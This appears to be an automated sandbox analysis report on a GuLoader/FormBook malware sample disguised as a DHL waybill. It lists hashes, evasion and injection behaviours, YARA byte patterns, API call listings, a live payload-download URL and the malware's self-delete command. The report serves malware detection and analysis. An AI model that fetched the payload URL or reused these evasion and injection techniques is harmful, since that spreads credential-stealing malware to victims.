Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report AWB# 9284730932.exe

Overview

General Information

Sample Name:AWB# 9284730932.exe
Analysis ID:320390
MD5:e69d0c42f97a007fb131b35cb8a4d7b8
SHA1:43ca208070bb88754a1d8626ea0ef596a6db1f72
SHA256:6e8b2b06ac2b8447aec7075c5c58edbe5a5377d74c9443e5caf9f379f53a8b6d
Tags:DHLexeGuLoader

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Potential malicious icon found
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • AWB# 9284730932.exe (PID: 5536 cmdline: 'C:\Users\user\Desktop\AWB# 9284730932.exe' MD5: E69D0C42F97A007FB131B35CB8A4D7B8)
    • AWB# 9284730932.exe (PID: 6252 cmdline: 'C:\Users\user\Desktop\AWB# 9284730932.exe' MD5: E69D0C42F97A007FB131B35CB8A4D7B8)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 6656 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cmd.exe (PID: 6676 cmdline: /c del 'C:\Users\user\Desktop\AWB# 9284730932.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.373125113.000000001E150000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000B.00000002.373125113.000000001E150000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000B.00000002.373125113.000000001E150000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    0000000B.00000002.373146227.000000001E180000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000B.00000002.373146227.000000001E180000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 15 entries

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Antivirus detection for URL or domainShow sources
      Source: https://lifeandhealth.com.mx/graceofgod/floow_tAAkniYUly238.binAvira URL Cloud: Label: malware
      Multi AV Scanner detection for submitted fileShow sources
      Source: AWB# 9284730932.exeVirustotal: Detection: 28%Perma Link
      Source: AWB# 9284730932.exeReversingLabs: Detection: 22%
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000000B.00000002.373125113.000000001E150000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.373146227.000000001E180000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.501858309.0000000002F20000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.501396069.0000000000520000.00000004.00000001.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0016245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,14_2_0016245C
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0015B89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,14_2_0015B89C
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001668BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,14_2_001668BA
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001731DC FindFirstFileW,FindNextFileW,FindClose,14_2_001731DC
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001585EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,14_2_001585EA
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_00569440 InternetReadFile,11_2_00569440
      Source: unknownDNS traffic detected: queries for: lifeandhealth.com.mx
      Source: explorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
      Source: explorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: explorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: explorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
      Source: explorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
      Source: explorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
      Source: explorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
      Source: explorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
      Source: explorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
      Source: explorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
      Source: explorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
      Source: explorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
      Source: explorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: explorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: explorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: explorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
      Source: explorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
      Source: explorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: explorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: explorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: explorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
      Source: explorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: explorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
      Source: explorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
      Source: explorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
      Source: explorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
      Source: AWB# 9284730932.exeString found in binary or memory: https://lifeandhealth.com.mx/graceofgod/floow_tAAkniYUly238.bin
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: AWB# 9284730932.exe, 00000001.00000002.306925484.000000000072A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000000B.00000002.373125113.000000001E150000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.373146227.000000001E180000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.501858309.0000000002F20000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.501396069.0000000000520000.00000004.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 0000000B.00000002.373125113.000000001E150000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000B.00000002.373125113.000000001E150000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000B.00000002.373146227.000000001E180000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000B.00000002.373146227.000000001E180000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000E.00000002.500985638.000000000025D000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 0000000E.00000002.501858309.0000000002F20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000E.00000002.501858309.0000000002F20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000E.00000002.503105850.000000000383F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 0000000E.00000002.501396069.0000000000520000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000E.00000002.501396069.0000000000520000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Potential malicious icon foundShow sources
      Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeProcess Stats: CPU usage > 98%
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D86B3 NtSetInformationThread,1_2_022D86B3
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D0782 EnumWindows,NtSetInformationThread,1_2_022D0782
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D0A8B NtSetInformationThread,NtWriteVirtualMemory,TerminateProcess,1_2_022D0A8B
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D8E42 NtProtectVirtualMemory,1_2_022D8E42
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D365C NtWriteVirtualMemory,1_2_022D365C
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D9440 NtResumeThread,1_2_022D9440
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D23B6 NtSetInformationThread,1_2_022D23B6
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D80E3 NtWriteVirtualMemory,1_2_022D80E3
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D082B NtSetInformationThread,1_2_022D082B
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D085F NtSetInformationThread,1_2_022D085F
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D08BB NtSetInformationThread,1_2_022D08BB
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D08FB NtSetInformationThread,1_2_022D08FB
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D0953 NtSetInformationThread,1_2_022D0953
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D4C71 NtWriteVirtualMemory,LoadLibraryA,1_2_022D4C71
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D963B NtResumeThread,1_2_022D963B
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D9607 NtResumeThread,1_2_022D9607
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D96DB NtResumeThread,1_2_022D96DB
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D36D3 NtWriteVirtualMemory,1_2_022D36D3
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D977B NtResumeThread,1_2_022D977B
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D974B NtResumeThread,1_2_022D974B
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D3754 NtWriteVirtualMemory,1_2_022D3754
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D37B8 NtWriteVirtualMemory,1_2_022D37B8
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D97B0 NtResumeThread,1_2_022D97B0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D9473 NtResumeThread,1_2_022D9473
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D94D7 NtResumeThread,1_2_022D94D7
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D9567 NtResumeThread,1_2_022D9567
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D3A90 NtWriteVirtualMemory,1_2_022D3A90
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D3ADF NtWriteVirtualMemory,1_2_022D3ADF
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D3B4C NtWriteVirtualMemory,1_2_022D3B4C
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D983B NtResumeThread,1_2_022D983B
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D3812 NtWriteVirtualMemory,1_2_022D3812
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D3873 NtWriteVirtualMemory,1_2_022D3873
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D98B4 NtResumeThread,1_2_022D98B4
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D38B3 NtWriteVirtualMemory,1_2_022D38B3
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D3914 NtWriteVirtualMemory,1_2_022D3914
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D3978 NtWriteVirtualMemory,1_2_022D3978
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D99AF NtResumeThread,1_2_022D99AF
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D3C7F NtWriteVirtualMemory,1_2_022D3C7F
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D3CD7 NtWriteVirtualMemory,1_2_022D3CD7
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D3D87 NtWriteVirtualMemory,1_2_022D3D87
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E9A20 NtResumeThread,LdrInitializeThunk,11_2_1E3E9A20
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E9A00 NtProtectVirtualMemory,LdrInitializeThunk,11_2_1E3E9A00
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E9660 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_1E3E9660
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E9A50 NtCreateFile,LdrInitializeThunk,11_2_1E3E9A50
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E96E0 NtFreeVirtualMemory,LdrInitializeThunk,11_2_1E3E96E0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E9710 NtQueryInformationToken,LdrInitializeThunk,11_2_1E3E9710
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E97A0 NtUnmapViewOfSection,LdrInitializeThunk,11_2_1E3E97A0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E9780 NtMapViewOfSection,LdrInitializeThunk,11_2_1E3E9780
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E9860 NtQuerySystemInformation,LdrInitializeThunk,11_2_1E3E9860
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E9840 NtDelayExecution,LdrInitializeThunk,11_2_1E3E9840
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E98F0 NtReadVirtualMemory,LdrInitializeThunk,11_2_1E3E98F0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_1E3E9910
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E9540 NtReadFile,LdrInitializeThunk,11_2_1E3E9540
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E99A0 NtCreateSection,LdrInitializeThunk,11_2_1E3E99A0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E95D0 NtClose,LdrInitializeThunk,11_2_1E3E95D0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E9610 NtEnumerateValueKey,11_2_1E3E9610
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E9A10 NtQuerySection,11_2_1E3E9A10
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E9670 NtQueryInformationProcess,11_2_1E3E9670
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E9650 NtQueryValueKey,11_2_1E3E9650
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E9A80 NtOpenDirectoryObject,11_2_1E3E9A80
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E96D0 NtCreateKey,11_2_1E3E96D0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E9730 NtQueryVirtualMemory,11_2_1E3E9730
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3EA710 NtOpenProcessToken,11_2_1E3EA710
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E9B00 NtSetValueKey,11_2_1E3E9B00
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E9770 NtSetInformationFile,11_2_1E3E9770
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3EA770 NtOpenThread,11_2_1E3EA770
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E9760 NtOpenProcess,11_2_1E3E9760
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3EA3B0 NtGetContextThread,11_2_1E3EA3B0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E9FE0 NtCreateMutant,11_2_1E3E9FE0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E9820 NtEnumerateKey,11_2_1E3E9820
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3EB040 NtSuspendThread,11_2_1E3EB040
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E98A0 NtWriteVirtualMemory,11_2_1E3E98A0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3EAD30 NtSetContextThread,11_2_1E3EAD30
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E9520 NtWaitForSingleObject,11_2_1E3E9520
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E9560 NtWriteFile,11_2_1E3E9560
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E9950 NtQueueApcThread,11_2_1E3E9950
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E95F0 NtQueryInformationFile,11_2_1E3E95F0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E99D0 NtCreateProcessEx,11_2_1E3E99D0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_00563104 TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,11_2_00563104
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_00563198 RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory,11_2_00563198
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_0056431B Sleep,NtProtectVirtualMemory,11_2_0056431B
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_0056447A LdrInitializeThunk,NtProtectVirtualMemory,11_2_0056447A
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_00568E42 NtProtectVirtualMemory,11_2_00568E42
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_0056308C TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,11_2_0056308C
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_0056318B LdrInitializeThunk,NtProtectVirtualMemory,11_2_0056318B
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_005643C6 NtProtectVirtualMemory,11_2_005643C6
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_00564461 LdrInitializeThunk,NtProtectVirtualMemory,11_2_00564461
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_00564469 LdrInitializeThunk,NtProtectVirtualMemory,11_2_00564469
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_005644EF LdrInitializeThunk,NtProtectVirtualMemory,11_2_005644EF
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_005644B3 LdrInitializeThunk,NtProtectVirtualMemory,11_2_005644B3
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_00564587 LdrInitializeThunk,NtProtectVirtualMemory,11_2_00564587
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0015B42E NtOpenThreadToken,NtOpenProcessToken,NtClose,14_2_0015B42E
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001584BE NtQueryVolumeInformationFile,GetFileInformationByHandleEx,14_2_001584BE
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001558A4 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,14_2_001558A4
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0015B4C0 NtQueryInformationToken,14_2_0015B4C0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0015B4F8 NtQueryInformationToken,NtQueryInformationToken,14_2_0015B4F8
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_00176D90 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,14_2_00176D90
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0017B5E0 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,14_2_0017B5E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_00179AB4 NtSetInformationFile,14_2_00179AB4
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001583F2 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,14_2_001583F2
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F9710 NtQueryInformationToken,LdrInitializeThunk,14_2_030F9710
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F9780 NtMapViewOfSection,LdrInitializeThunk,14_2_030F9780
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F9FE0 NtCreateMutant,LdrInitializeThunk,14_2_030F9FE0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F9A50 NtCreateFile,LdrInitializeThunk,14_2_030F9A50
